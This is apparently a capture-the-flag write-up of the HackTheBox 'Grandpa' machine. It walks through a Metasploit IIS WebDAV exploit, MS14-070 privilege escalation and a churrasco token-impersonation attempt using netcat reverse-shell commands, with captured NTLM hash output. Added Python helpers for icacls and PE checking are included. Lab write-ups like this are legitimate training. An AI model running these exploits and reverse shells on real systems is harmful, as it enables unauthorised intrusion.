Grandpa
Grandpa was next after Irked; I went in blind.
Ports
HTTP only.
IIS 6.0
Nmap says:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
A quick google and I decide to yeet metasploit at it:
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
rhosts => 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.10
lhost => 10.10.14.10
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
[*] Started reverse TCP handler on 10.10.14.10:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.10:4444 -> 10.10.10.14:1032) at 2021-03-14 05:31:44 -0400
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 2132 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
Privesc
I run the local exploit suggester and get about 6 different potential options; none of them work. I google for kernel exploits for Server 2003 SP1 (this is what we've got), find some more options and try them; nada.
What I was doing wrong - and I was doing something wrong - was that I needed to migrate into a different process before I started. So once that was done, no more problems:
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions 1
[*] Starting interaction with 1...
meterpreter > ps
Process List
============
PID   PPID  Name              Arch  Session  User                          Path
---   ----  ----              ----  -------  ----                          ----
0     0     [System Process]
4     0     System
272   4     smss.exe
280   1080  cidaemon.exe
320   1080  cidaemon.exe
# etc
1408  396   vmtoolsd.exe
1456  396   svchost.exe
1600  396   svchost.exe
1704  396   alg.exe
1840  612   wmiprvse.exe      x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\wbem\wmiprvse.exe
1920  396   dllhost.exe
2316  612   wmiprvse.exe
2752  3180  rundll32.exe      x86   0                                      C:\WINDOWS\system32\rundll32.exe
3180  1456  w3wp.exe          x86   0        NT AUTHORITY\NETWORK SERVICE  c:\windows\system32\inetsrv\w3wp.exe
3628  612   davcdata.exe      x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe
3988  2752  cmd.exe           x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\cmd.exe
4092  1080  cidaemon.exe
meterpreter > migrate 3628
[*] Migrating from 2752 to 3628...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
[*] Started reverse TCP handler on 10.10.14.10:1234
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 2 opened (10.10.14.10:1234 -> 10.10.10.14:1040) at 2021-03-14 06:05:40 -0400
meterpreter > shell
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
I’m going to do this again tomorrow without Metasploit by following a walkthrough.
Addendum
So I went back to this to try it without MSF. I looked at a couple of write-ups, but they used identical tooling. Foothold was via this Python script. The script contains a whole bunch of shellcode, so it's not really clear what it does, and nothing is really gained in terms of understanding compared to using Metasploit.
Anyway, it’s invoked like so:
python shell.py 10.10.10.14 80 10.10.14.5 1234
And you catch the shell in a listener. Next, people used a 'token impersonation' attack for privesc with a binary called churrasco. It's copied to a directory that we have write access to (which we conveniently have at C:\wmpub), then executed. Copy it, along with netcat, using Impacket's smbserver:
┌──(root💀kali)-[/opt/htb/grandpa]
└─# python3 /usr/share/doc/python3-impacket/examples/smbserver.py share .
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.14,1031)
[*] AUTHENTICATE_MESSAGE (\, GRANPA)
[*] User GRANPA\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] AUTHENTICATE_MESSAGE (HTB\GRANPA$, GRANPA)
[*] User GRANPA\GRANPA$ authenticated successfully
[*] GRANPA$::HTB:d62c92d82cb9dafc00000000000000000000000000000000:6521e6930e53d3e7c9bb0cbbcb53eb6a8d769dc217d66bbc:aaaaaaaaaaaaaaaa
# etc
Copy the files:
C:\wmpub>icacls C:\wmpub
icacls C:\wmpub
C:\wmpub BUILTIN\Administrators:(F)
         BUILTIN\Administrators:(I)(OI)(CI)(F)
         NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
         CREATOR OWNER:(I)(OI)(CI)(IO)(F)
         BUILTIN\Users:(I)(OI)(CI)(RX)
         BUILTIN\Users:(I)(CI)(AD)
         BUILTIN\Users:(I)(CI)(WD)
Successfully processed 1 files; Failed processing 0 files
C:\wmpub>copy \\10.10.14.5\share\nc.exe .
copy \\10.10.14.5\share\nc.exe .
        1 file(s) copied.
C:\wmpub>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE
 Directory of C:\wmpub
03/16/2021  10:59 AM    <DIR>          .
03/16/2021  10:59 AM    <DIR>          ..
03/16/2021  10:52 AM            59,392 nc.exe
04/12/2017  04:05 PM    <DIR>          wmiislog
               1 File(s)         59,392 bytes
               3 Dir(s)  18,093,953,024 bytes free
C:\wmpub>copy \\10.10.14.5\share\churrasco.exe c.exe
copy \\10.10.14.5\share\churrasco.exe c.exe
        1 file(s) copied.
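What makes C:\wmpub usable here is not the (RX) entry but the two BUILTIN\Users entries carrying (AD) and (WD): add-subdirectory and write-data/add-file rights on the directory itself. Reading that off an icacls listing by eye is error-prone, so the following is an added example (my own code, not from the write-up, churrasco or Impacket) that parses icacls output of exactly that shape and answers "can this token create a file here?". The sample listing is reconstructed from the C:\wmpub output above; the list of groups assumed to be in NETWORK SERVICE's token is a constructed assumption, not something the page shows.

```python
"""Decide from `icacls` output whether a directory lets the current token create files.

Added example; not code from the write-up, churrasco or Impacket. Parses the ACE lines
icacls prints (`principal:(flags)(rights)`), skips inherit-only entries (they apply to
children, not the directory itself), honours (DENY) entries, and reports whether any
file-create right is granted to one of the caller's principals.
"""
import re

# Constructed sample: the icacls listing shown for C:\wmpub.
SAMPLE_ICACLS = r"""C:\wmpub BUILTIN\Administrators:(F)
         BUILTIN\Administrators:(I)(OI)(CI)(F)
         NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
         CREATOR OWNER:(I)(OI)(CI)(IO)(F)
         BUILTIN\Users:(I)(OI)(CI)(RX)
         BUILTIN\Users:(I)(CI)(AD)
         BUILTIN\Users:(I)(CI)(WD)

Successfully processed 1 files; Failed processing 0 files
"""

# Assumption (constructed): groups typically present in a NETWORK SERVICE token.
NETWORK_SERVICE_GROUPS = [
    r"NT AUTHORITY\NETWORK SERVICE",
    r"BUILTIN\Users",
    "Everyone",
    r"NT AUTHORITY\Authenticated Users",
    r"NT AUTHORITY\SERVICE",
]

ACE_RE = re.compile(r"^(?P<who>.+?):(?P<parts>(?:\([^)]*\))+)$")
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
# Rights that allow creating a file in a directory: full, modify, write, or the
# specific right WD (write data / add file). AD alone only allows adding subdirectories.
FILE_CREATE_RIGHTS = {"F", "M", "W", "WD", "GA", "GW"}


def parse_icacls(text: str, path: str):
    """Parse `icacls <path>` output into a list of (principal, flags, rights, is_deny).

    Principals are lower-cased so lookups are case-insensitive, as on Windows.
    """
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.lower().startswith(path.lower()):
            line = line[len(path):].strip()          # first line carries the path before its ACE
        m = ACE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised icacls line: {raw!r}")
        flags, rights, is_deny = set(), set(), False
        for token in re.findall(r"\(([^)]*)\)", m.group("parts")):
            if token == "DENY":
                is_deny = True
            elif token in INHERIT_FLAGS:
                flags.add(token)
            else:
                rights.update(t.strip() for t in token.split(","))
        aces.append((m.group("who").lower(), flags, rights, is_deny))
    return aces


def can_create_files(aces, principals) -> bool:
    """Can a token holding `principals` create a file directly in this directory?

    Simplified evaluation: inherit-only ACEs are ignored, then a deny on a
    file-create right wins over any allow.
    """
    wanted = {p.lower() for p in principals}
    allowed = denied = False
    for who, flags, rights, is_deny in aces:
        if who not in wanted or "IO" in flags:
            continue
        if rights & FILE_CREATE_RIGHTS:
            if is_deny:
                denied = True
            else:
                allowed = True
    return allowed and not denied


if __name__ == "__main__":
    aces = parse_icacls(SAMPLE_ICACLS, r"C:\wmpub")
    for who, flags, rights, is_deny in aces:
        print(f"{'DENY ' if is_deny else ''}{who:32s} flags={sorted(flags)} rights={sorted(rights)}")
    print("NETWORK SERVICE can drop a file here:", can_create_files(aces, NETWORK_SERVICE_GROUPS))
```

Run it against the real listing by pasting the icacls output into SAMPLE_ICACLS (or reading it from a file) and swapping in the groups your own token actually holds. Note the CREATOR OWNER entry: it is (IO), so it grants nothing on the directory itself, which is why the function ignores it.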
And execute it; whatever is passed after -d is run as SYSTEM:
C:\wmpub>.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.5 1235"
.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.5 1235"
Program too big to fit in memory
Ahhhhh, WTF? This is the same as what 0xdf did:
C:\wmpub>.\c.exe -d "C:\wmpub\nc.exe -e cmd.exe 10.10.14.47 443"
But it worked for him, and not for me. Grrrr. Try this then:
C:\wmpub>.\c.exe -d "type C:\Users\Administrator\Desktop\root.txt"
Program too big to fit in memory
Dunno why I bothered really.
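"Program too big to fit in memory" is the message the Windows loader gives when the file it is asked to run is not a valid executable image, typically an empty, truncated or otherwise corrupt copy (a partial download, or an HTML error page saved under the .exe name). The dir listing above shows nc.exe's size but c.exe's is never checked, so the first thing a practitioner would want is a way to confirm, before serving a binary, that it is a well-formed 32-bit PE and to record its size and hash for comparison with dir on the target. The following is an added example of that check (my own code, not from the write-up, churrasco or Impacket); the sample images it tests against are constructed in the file, and the assumption is that the target, like Server 2003 x86 here, needs a 32-bit image.

```python
"""Sanity-check a Windows executable before serving it to a target.

Added example, not part of the original write-up. It parses just enough of the PE
headers (DOS header, PE signature, COFF header, optional-header magic, section table)
to tell a well-formed binary from an empty file, a truncated copy or an HTML page
saved as .exe, and reports size and SHA-256 for comparison with `dir` on the target.
All sample inputs are constructed in this file.
"""
import hashlib
import struct

IMAGE_FILE_MACHINE_I386 = 0x14C
IMAGE_FILE_MACHINE_AMD64 = 0x8664
PE32_MAGIC = 0x10B       # 32-bit optional header
PE32PLUS_MAGIC = 0x20B   # 64-bit optional header


def check_pe(data: bytes) -> dict:
    """Return a report: ok, size, sha256, reason, and on success machine/bits/sections."""
    report = {"ok": False, "size": len(data),
              "sha256": hashlib.sha256(data).hexdigest(), "reason": ""}
    # DOS header: 'MZ' at offset 0, e_lfanew (file offset of 'PE\0\0') at 0x3C.
    if len(data) < 0x40 or data[:2] != b"MZ":
        report["reason"] = "no MZ header (empty file or HTML error page saved as .exe?)"
        return report
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        report["reason"] = "no PE signature at e_lfanew"
        return report
    # COFF header: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics.
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    if opt_size < 2 or opt_off + opt_size > len(data):
        report["reason"] = "optional header truncated"
        return report
    magic = struct.unpack_from("<H", data, opt_off)[0]
    bits = {PE32_MAGIC: 32, PE32PLUS_MAGIC: 64}.get(magic)
    if bits is None:
        report["reason"] = f"unknown optional header magic 0x{magic:x}"
        return report
    # Section table follows the optional header; every section's raw data must lie
    # inside the file, which is exactly what a partial copy violates.
    sect_off = opt_off + opt_size
    for i in range(nsections):
        off = sect_off + 40 * i
        if off + 40 > len(data):
            report["reason"] = f"section table truncated at entry {i}"
            return report
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, off)
        if raw_ptr + raw_size > len(data):
            sname = name.rstrip(b"\0").decode("ascii", "replace")
            report["reason"] = f"section {sname} raw data runs past end of file (truncated copy?)"
            return report
    report.update(ok=True, machine=machine, bits=bits, sections=nsections)
    return report


def fits_target(data: bytes, bits: int = 32) -> bool:
    """True if `data` is a well-formed PE of the given bitness (32 for Server 2003 x86)."""
    report = check_pe(data)
    return report["ok"] and report["bits"] == bits


def build_sample_pe(machine: int = IMAGE_FILE_MACHINE_I386) -> bytes:
    """Construct a minimal header-only PE image for the demonstration (not a runnable program)."""
    if machine == IMAGE_FILE_MACHINE_AMD64:
        opt = struct.pack("<H", PE32PLUS_MAGIC).ljust(240, b"\0")
    else:
        opt = struct.pack("<H", PE32_MAGIC).ljust(224, b"\0")
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)            # PE header directly after the DOS header
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, len(opt), 0x0102)
    raw_ptr, raw_size = 0x200, 0x200                   # one section: 512 bytes at file offset 0x200
    sect = struct.pack("<8sIIIIIIHHI", b".text\0\0\0", raw_size, 0x1000, raw_size, raw_ptr,
                       0, 0, 0, 0, 0x60000020)
    headers = bytes(dos) + b"PE\0\0" + coff + opt + sect
    return headers.ljust(raw_ptr, b"\0") + b"\xc3" * raw_size


if __name__ == "__main__":
    samples = {
        "good x86": build_sample_pe(),
        "x64 build": build_sample_pe(IMAGE_FILE_MACHINE_AMD64),
        "truncated": build_sample_pe()[:0x300],
        "html page": b"<html><body>404 Not Found</body></html>",
        "empty": b"",
    }
    for label, blob in samples.items():
        r = check_pe(blob)
        print(f"{label:10s} size={r['size']:5d} ok={r['ok']!s:5s} bits={r.get('bits')} {r['reason']}")
```

To use it on a real file, `check_pe(open("churrasco.exe", "rb").read())` before starting smbserver, then compare the reported size with what dir shows in C:\wmpub after the copy; a mismatch is the first thing to rule out before blaming the exploit itself.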